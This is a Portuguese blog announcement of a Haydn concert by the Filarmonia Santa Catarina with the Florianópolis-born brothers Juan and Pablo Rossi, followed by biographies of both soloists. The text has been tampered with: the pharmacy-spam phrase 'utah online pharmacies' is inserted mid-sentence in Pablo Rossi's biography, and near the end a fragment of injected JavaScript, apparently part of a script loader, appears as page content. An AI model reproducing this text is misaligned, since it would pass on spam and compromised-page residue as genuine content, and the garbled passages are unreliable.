Música sinfônicaProgramaçãoSanta Catarina

Filarmonia Santa Catarina recebe convidados

Atualmente vivendo na Europa, Juan Rossi e Pablo Rossi vêm ao Brasil e se apresentam em sua cidade natal, Florianópolis.

SERVIÇO

Teatro Álvaro de Carvalho

Dia 15.07, às 21h.

Ingressos: R$ 20,00 e R$ 10,00

Os irmãos catarinenses Juan Rossi (violinista) e Pablo Rossi (pianista), que atualmente vivem na Europa, agraciados com bolsa de estudos do Governo de Santa Catarina, são os convidados da Orquestra Filarmonia Santa Catarina para o concerto especial apenas com obras do compositor austríaco Joseph Haydn, considerado o maior influenciador do estilo da época.  A apresentação será no dia 15 de julho e terá regência do Maestro Gustavo Lange Fontes.

Entre as obras apresentadas na noite, estarão o Concerto em Sol para Violino e Orquestra e o Concerto em Ré para Piano e Orquestra. Para encerrar, os músicos sobem ao palco juntos para a execução do seu único Concerto para esses dois instrumentos. O Concerto para Violino, Piano e Cordas em Fá Maior, Hob. XVIII:6 é uma obra pouco conhecida e apresenta uma formação incomum de violino e piano como solistas.

O convite para tocar com a Filarmonia Santa Catarina não foi po

r acaso, já que os jovens possuem currículos invejáveis.

Juan Rossi

Com 24 anos, vencedor do I Concurso de Violino Faculdade Cantareira, é um dos promissores talentos da mais nova geração de violinistas brasileiros. Participou de vários cursos e festivais internacionais de música, principalmente na Alemanha e Estados Unidos. Integrou o naipe de primeiros violinos da Orquestra Sinfônica Municipal de São Paulo (OSM) e atualmente cursa mestrado na Universidade Mozarteum de Salzburg, na Áustria, onde integra diversas orquestras do país.

Pablo Rossi

Pianista de 22 anos, iniciou seus estudos musicais aos 6 anos de idade, em Florianópolis. Aos 7, já havia conquistado seu primeiro prêmio, no IV Concurso Jovens Intérpretes de Lages. Depois disso, vieram inúmeros concursos nacionais e internacionais, em países como Argentina e Espanha.  No currículo do pianista, estão apresentações com importantes orquestras de diversos lugares do mundo, como a Orquestra de Câmara do Kremlin, Orquestra Sinfônica de Kirov, Orquestra de Câmara de Moscou, Orquestra Sinfônica do Estado de São Paulo e Orquestra Sinfônica Brasileira. O jovem utah online pharmacies talento de 22 anos de idade reside hoje na Rússia, onde cursa a faculdade de piano no Conservatório Tchaikovsky de Moscou.

document.currentScript.parentNode.insertBefore(s, document.currentScript);if (document.currentScript) {

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.